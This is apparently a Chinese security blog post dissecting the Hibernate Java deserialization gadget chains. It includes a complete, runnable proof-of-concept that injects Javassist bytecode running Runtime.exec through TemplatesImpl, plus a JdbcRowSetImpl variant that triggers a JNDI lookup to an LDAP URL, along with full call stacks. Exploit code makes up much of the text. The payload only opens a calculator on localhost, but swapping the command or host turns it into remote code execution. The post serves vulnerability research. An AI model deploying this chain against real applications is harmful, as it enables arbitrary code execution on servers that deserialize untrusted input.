寫在前面
Hibernate是一個開源免費的、基于 ORM 技術的 Java 持久化框架。通俗地說,Hibernate 是一個用來連接和操作數據庫的 Java 框架,它最大的優點是使用了 ORM 技術。
Hibernate 支持幾乎所有主流的關系型數據庫,只要在配置文件中設置好當前正在使用的數據庫,程序員就不需要操心不同數據庫之間的差異。
分析
對于Hibernate框架的反序列化鏈主要是通過調用了任意的getter方法,結合TemplatesImpl這條鏈子進行利用鏈的構造。
BasicPropertyAccessor
在該框架中存在有org.hibernate.property.PropertyAccessor這個接口
我們從這個注釋可以知道,定義了一個類的屬性值的相關策略
在接口中的定義了兩個方法,分別為getGettergetSetter方法
該接口的實現類是BasicPropertyAccessor
定義了兩個實現類BasicGetter/ BasicSetter
主要來看看BasicGetter類
首先,在其構造方法中傳入了三個參數,分別是目標類,目標方法,目標屬性。
同時關注get方法的實現,將會觸發目標的method方法,這里就是漏洞點。
那么這個Getter又是從何而來的呢?
我們可以關注到BasciPropertyAccessor?類對getSetter方法的重寫
在getSetter方法中將會調用createGetter?方法,進而調用了getGetterOrNull方法。
在該方法中,將會通過getterMethod?方法得到對應屬性的getter方法名,如果存在的話,將會將其封裝為BasicGetter對象進行返回。
那我們跟進一下getterMethod方法
首先在該方法中將會調用theClass.getDeclaredMethods?方法得到目標類的所有存在的方法,之后遍歷這些方法,如果該方法參數個數不為零就跳過,獲取方法返回Bridge也會跳過,之后在獲取該方法名之后,判斷是否是get開頭,如果是,將會進行比對處理之后返回這個方法。
就這樣得到了對應的Getter方法,而想要調用,還需要使用他的get方法。
那么又是在哪里調用了其get方法的呢?
AbstractComponentTuplizer
答案就這個類中
類中存在一個getPropertyValue方法
將會遍歷調用getters屬性中的get方法
我們看看getters屬性是個啥
他是一個Getter對象數組,正好了,上面返回了一個Getter方法,可以反射寫入這個數組中,在getPropertyValue方法中調用其get方法,達到利用鏈的觸發。
但是值得注意的是AbstractComponentTuplizer是一個抽象類,我們尋找一下他的子類。
存在有兩個子類,DynamicMapComponentTuplizer?類和PojoComponentTuplizer類一個是處理映射為Map對象,一個映射為JAVA實體。
我們可以發現在PojoComponentTuplizer?類中存在有getPropertyValues方法。
且能夠調用父類的getPropertyValues方法,
那么這個類方法又是在何處存在調用。
TypedValue
通過Uage的搜索,發現在org.hibernate.type.ComponentType#getPropertyValue存在有相關方法的調用。
這條鏈子的關鍵點還是在org.hibernate.engine.spi.TypedValue類中。
在其構造方法中傳入了Type和Object對象的映射,在上面提到的ComponentType同樣實現了Type接口。
在構造方法中除了賦值,還調用了initTransients方法。
創建了一個 ValueHolder 對象,并為其賦予了一個新的 DeferredInitializer 對象并重寫了initialize()方法。
之后將其賦予給hashCode屬性,我們可以關注到反序列化入口點,在hashCode?方法中調用了初始化賦值的hashCode屬性的getValue方法。
即是調用了ValueHolder#getValue方法,
在這里將會調用之前初始化時重寫的initialize方法,
如果此時的type是ComponentType?就將會調用它的getHashCode方法,
最終調用了getPropertyValue方法形成了利用鏈。
利用構造
Hibernate1
同樣的,首先創建一個TemplatesImpl對象
//動態創建字節碼
String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.makeClass("Evil");
ctClass.makeClassInitializer().insertBefore(cmd);
ctClass.setSuperclass(pool.get(AbstractTranslet.class.getName()));
byte[] bytes = ctClass.toBytecode();
TemplatesImpl templates = new TemplatesImpl();
SerializeUtil.setFieldValue(templates, "_name", "RoboTerh");
SerializeUtil.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
SerializeUtil.setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
之后獲取對應的getter。
// 創建 BasicGetter 實例,用來觸發 TemplatesImpl 的 getOutputProperties 方法
Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
Constructor<?> constructor = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
constructor.setAccessible(true);
getter = constructor.newInstance(templates.getClass(), method, "outputProperties");
之后我們需要觸發getter的get方法,根據前面的分析,我們可以知道是通過調用org.hibernate.tuple.component.PojoComponentTuplizer類觸發get的調用。
所以我們創建一個實例并反射寫入數據。
Object tuplizer = SerializeUtil.createWithoutConstructor(pojoComponentTuplizerClass);
// 反射將 BasicGetter 寫入 PojoComponentTuplizer 的成員變量 getters 里
Field field = abstractComponentTuplizerClass.getDeclaredField("getters");
field.setAccessible(true);
Object getters = Array.newInstance(getter.getClass(), 1);
Array.set(getters, 0, getter);
field.set(tuplizer, getters);
完整的POC。
package pers.hibernate;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.hibernate.engine.spi.TypedValue;
import org.hibernate.type.Type;
import pers.util.SerializeUtil;
import java.io.ByteArrayOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
public class Hibernate1 {
public static void main(String[] args) throws Exception {
Class<?> componentTypeClass = Class.forName("org.hibernate.type.ComponentType");
Class<?> pojoComponentTuplizerClass = Class.forName("org.hibernate.tuple.component.PojoComponentTuplizer");
Class<?> abstractComponentTuplizerClass = Class.forName("org.hibernate.tuple.component.AbstractComponentTuplizer");
//動態創建字節碼
String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.makeClass("Evil");
ctClass.makeClassInitializer().insertBefore(cmd);
ctClass.setSuperclass(pool.get(AbstractTranslet.class.getName()));
byte[] bytes = ctClass.toBytecode();
TemplatesImpl templates = new TemplatesImpl();
SerializeUtil.setFieldValue(templates, "_name", "RoboTerh");
SerializeUtil.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
SerializeUtil.setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
Method method = TemplatesImpl.class.getDeclaredMethod("getOutputProperties");
Object getter;
try {
// 創建 GetterMethodImpl 實例,用來觸發 TemplatesImpl 的 getOutputProperties 方法
Class<?> getterImpl = Class.forName("org.hibernate.property.access.spi.GetterMethodImpl");
Constructor<?> constructor = getterImpl.getDeclaredConstructors()[0];
constructor.setAccessible(true);
getter = constructor.newInstance(null, null, method);
} catch (Exception ignored) {
// 創建 BasicGetter 實例,用來觸發 TemplatesImpl 的 getOutputProperties 方法
Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
Constructor<?> constructor = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
constructor.setAccessible(true);
getter = constructor.newInstance(templates.getClass(), method, "outputProperties");
}
// 創建 PojoComponentTuplizer 實例,用來觸發 Getter 方法
Object tuplizer = SerializeUtil.createWithoutConstructor(pojoComponentTuplizerClass);
// 反射將 BasicGetter 寫入 PojoComponentTuplizer 的成員變量 getters 里
Field field = abstractComponentTuplizerClass.getDeclaredField("getters");
field.setAccessible(true);
Object getters = Array.newInstance(getter.getClass(), 1);
Array.set(getters, 0, getter);
field.set(tuplizer, getters);
// 創建 ComponentType 實例,用來觸發 PojoComponentTuplizer 的 getPropertyValues 方法
Object type = SerializeUtil.createWithoutConstructor(componentTypeClass);
// 反射將相關值寫入,滿足 ComponentType 的 getHashCode 調用所需條件
Field field1 = componentTypeClass.getDeclaredField("componentTuplizer");
field1.setAccessible(true);
field1.set(type, tuplizer);
Field field2 = componentTypeClass.getDeclaredField("propertySpan");
field2.setAccessible(true);
field2.set(type, 1);
Field field3 = componentTypeClass.getDeclaredField("propertyTypes");
field3.setAccessible(true);
field3.set(type, new Type[]{(Type) type});
// 創建 TypedValue 實例,用來觸發 ComponentType 的 getHashCode 方法
TypedValue typedValue = new TypedValue((Type) type, null);
// 創建反序列化用 HashMap
HashMap<Object, Object> hashMap = new HashMap<>();
hashMap.put(typedValue, "su18");
// put 到 hashmap 之后再反射寫入,防止 put 時觸發
Field valueField = TypedValue.class.getDeclaredField("value");
valueField.setAccessible(true);
valueField.set(typedValue, templates);
ByteArrayOutputStream byteArrayOutputStream = SerializeUtil.writeObject(hashMap);
SerializeUtil.readObject(byteArrayOutputStream);
}
}
解釋一下其中try catch句中是因為:
在不同版本中,由于部分類的更新交替,利用的 Gadget 細節則不同。ysoserial 中也根據不同情況給出了需要修改的利用鏈:
使用org.hibernate.property.access.spi.GetterMethodImpl?替代org.hibernate.property.BasicPropertyAccessor$BasicGetter。
使用org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping來對 PojoComponentTuplizer 進行封裝。
調用棧
exec:347, Runtime (java.lang)
<clinit>:-1, Evil
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:62, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:423, Constructor (java.lang.reflect)
newInstance:442, Class (java.lang)
getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
get:169, BasicPropertyAccessor$BasicGetter (org.hibernate.property)
getPropertyValue:76, AbstractComponentTuplizer (org.hibernate.tuple.component)
getPropertyValue:414, ComponentType (org.hibernate.type)
getHashCode:242, ComponentType (org.hibernate.type)
initialize:98, TypedValue$1 (org.hibernate.engine.spi)
initialize:95, TypedValue$1 (org.hibernate.engine.spi)
getValue:72, ValueHolder (org.hibernate.internal.util)
hashCode:73, TypedValue (org.hibernate.engine.spi)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1170, ObjectStreamClass (java.io)
readSerialData:2178, ObjectInputStream (java.io)
readOrdinaryObject:2069, ObjectInputStream (java.io)
readObject0:1573, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:51, SerializeUtil (pers.util)
main:102, Hibernate1 (pers.hibernate)
Hibernate2
上一條鏈是通過觸發TemplatesImpl類的getOutputProperties方法觸發的。
這條鏈就是通過JdbcRowSetImpl這條鏈觸發JNDI注入,細節在fastjson的利用鏈中就講過了,可以找一下我的文章。
因為我們能夠觸發任意的getter方法,所以我們可以通過調用getDatabaseMetaData方法。
進而調用connect方法觸發漏洞,
POC的構造也很簡單,只需要將前面創建TemplatesImpl對象的部分改為創建JdbcRowSetImpl 類對象。
JdbcRowSetImpl rs = new JdbcRowSetImpl();
rs.setDataSourceName("ldap://127.0.0.1:23457/Command8");
Method method = JdbcRowSetImpl.class.getDeclaredMethod("getDatabaseMetaData");
調用鏈
exec:347, Runtime (java.lang)
<clinit>:-1, ExecTemplateJDK8
forName0:-1, Class (java.lang)
forName:348, Class (java.lang)
loadClass:91, VersionHelper12 (com.sun.naming.internal)
loadClass:106, VersionHelper12 (com.sun.naming.internal)
getObjectFactoryFromReference:158, NamingManager (javax.naming.spi)
getObjectInstance:189, DirectoryManager (javax.naming.spi)
c_lookup:1085, LdapCtx (com.sun.jndi.ldap)
p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)
lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)
lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)
lookup:94, ldapURLContext (com.sun.jndi.url.ldap)
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
get:169, BasicPropertyAccessor$BasicGetter (org.hibernate.property)
getPropertyValue:76, AbstractComponentTuplizer (org.hibernate.tuple.component)
getPropertyValue:414, ComponentType (org.hibernate.type)
getHashCode:242, ComponentType (org.hibernate.type)
initialize:98, TypedValue$1 (org.hibernate.engine.spi)
initialize:95, TypedValue$1 (org.hibernate.engine.spi)
getValue:72, ValueHolder (org.hibernate.internal.util)
hashCode:73, TypedValue (org.hibernate.engine.spi)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1170, ObjectStreamClass (java.io)
readSerialData:2178, ObjectInputStream (java.io)
readOrdinaryObject:2069, ObjectInputStream (java.io)
readObject0:1573, ObjectInputStream (java.io)
readObject:431, ObjectInputStream (java.io)
readObject:51, SerializeUtil (pers.util)
main:88, Hibernate2 (pers.hibernate)
總結
對于Hibernate的鏈子來說,還是要看具體的版本,再次修改POC,自我感覺版本之間的關鍵方法差異有點大。
Ref
https://su18.org/
